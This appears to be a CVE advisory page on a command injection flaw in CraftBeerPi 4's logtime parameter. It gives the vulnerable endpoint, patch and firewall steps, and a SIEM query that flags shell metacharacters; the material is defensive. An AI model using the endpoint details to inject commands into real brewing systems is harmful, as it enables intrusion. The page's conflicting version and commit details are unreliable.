CVE-2024-3955 – CVE-2024-3955 is a critical command injection v... (How to Fix)

Q: What is the severity of CVE-2024-3955?

CVE-2024-3955 has a CVSS score of 9.8 (CRITICAL). CVE-2024-3955 is a critical command injection vulnerability in CraftBeerPi 4 that allows unauthenticated remote attackers to execute arbitrary commands on the system by manipulating the 'logtime' parameter. This affects all users running vulnerable versions of CraftBeerPi 4, particularly those with internet-facing instances. The vulnerability stems from improper input validation before passing user-controlled data to the os.system() function.

📋 TL;DR

CVE-2024-3955 is a critical command injection vulnerability in CraftBeerPi 4 that allows unauthenticated remote attackers to execute arbitrary commands on the system by manipulating the 'logtime' parameter. This affects all users running vulnerable versions of CraftBeerPi 4, particularly those with internet-facing instances. The vulnerability stems from improper input validation before passing user-controlled data to the os.system() function.

💻 Affected Systems

Products:

CraftBeerPi 4

Versions: From 4.0.0.58 (commit 563fae9) to before 4.4.1.a1 (commit 575727c)

Operating Systems: Linux (primary), potentially any OS running Python

Default Config Vulnerable: ⚠️ Yes

Notes: All default installations within the affected version range are vulnerable. The vulnerability is in the core code and doesn't require special configuration.

⚠️ Manual Verification Required

This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.

Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).

🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.

Recommended Actions:

Review the CVE details at NVD
Check vendor security advisories for your specific version
Test if the vulnerability is exploitable in your environment
Consider updating to the latest version as a precaution

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise allowing attacker to install malware, exfiltrate data, pivot to other systems, or cause physical damage to brewing equipment.

🟠

Likely Case

Attacker gains shell access to the CraftBeerPi server, potentially compromising the entire system and any connected brewing equipment.

🟢

If Mitigated

Limited impact due to network segmentation, proper input validation, and restricted user permissions.

🌐 Internet-Facing: HIGH - Unauthenticated RCE accessible via HTTP requests makes internet-facing instances extremely vulnerable to automated attacks.

🏢 Internal Only: HIGH - Even internal instances are vulnerable to any user with network access to the CraftBeerPi service.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

The vulnerability is straightforward to exploit with simple HTTP requests containing command injection payloads in the logtime parameter.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.4.1.a1 (commit 57572c7) and later

Vendor Advisory: https://github.com/PiBrewing/craftbeerpi4/issues/132

Restart Required: Yes

Instructions:

1. Backup your configuration and data. 2. Update CraftBeerPi 4 to version 4.4.1.a1 or later using: git pull origin master. 3. Restart the CraftBeerPi service. 4. Verify the fix by checking the version.

🔧 Temporary Workarounds

Input Validation Filter

all

Add input validation to sanitize the logtime parameter before processing

Modify cbpi/http_endpoints/http_system.py to validate logtime parameter contains only expected characters (digits, letters, hyphens, underscores)

Network Access Restriction

linux

Restrict network access to CraftBeerPi service

sudo ufw deny 5000/tcp
sudo iptables -A INPUT -p tcp --dport 5000 -j DROP

🧯 If You Can't Patch

Immediately isolate the CraftBeerPi system from the internet and restrict network access to trusted IPs only
Implement a web application firewall (WAF) with command injection rules to block malicious requests

🔍 How to Verify

Check if Vulnerable:

Check if your CraftBeerPi version is between 4.0.0.58 and 4.4.1.a1, or test by sending a request with command injection in logtime parameter

Check Version:

Check the CraftBeerPi web interface or examine the git commit history

Verify Fix Applied:

Verify version is 4.4.1.a1 or later and test that command injection attempts are properly rejected

📡 Detection & Monitoring

Log Indicators:

Unusual system commands in CraftBeerPi logs
Multiple failed command injection attempts
Suspicious logtime parameter values in HTTP logs

Network Indicators:

HTTP requests to /api/system/log/download with unusual logtime parameters
Outbound connections from CraftBeerPi to unexpected destinations

SIEM Query:

source="craftbeerpi" AND ("logtime" CONTAINS "|" OR "logtime" CONTAINS ";" OR "logtime" CONTAINS "`" OR "logtime" CONTAINS "$")

📊 Metadata

CVE ID: CVE-2024-3955

CVSS v3 Score: 9.8 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CWE: CWE-94

Published: May 2, 2024

Last Updated: November 21, 2024

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2024-3955, you might also want to check these: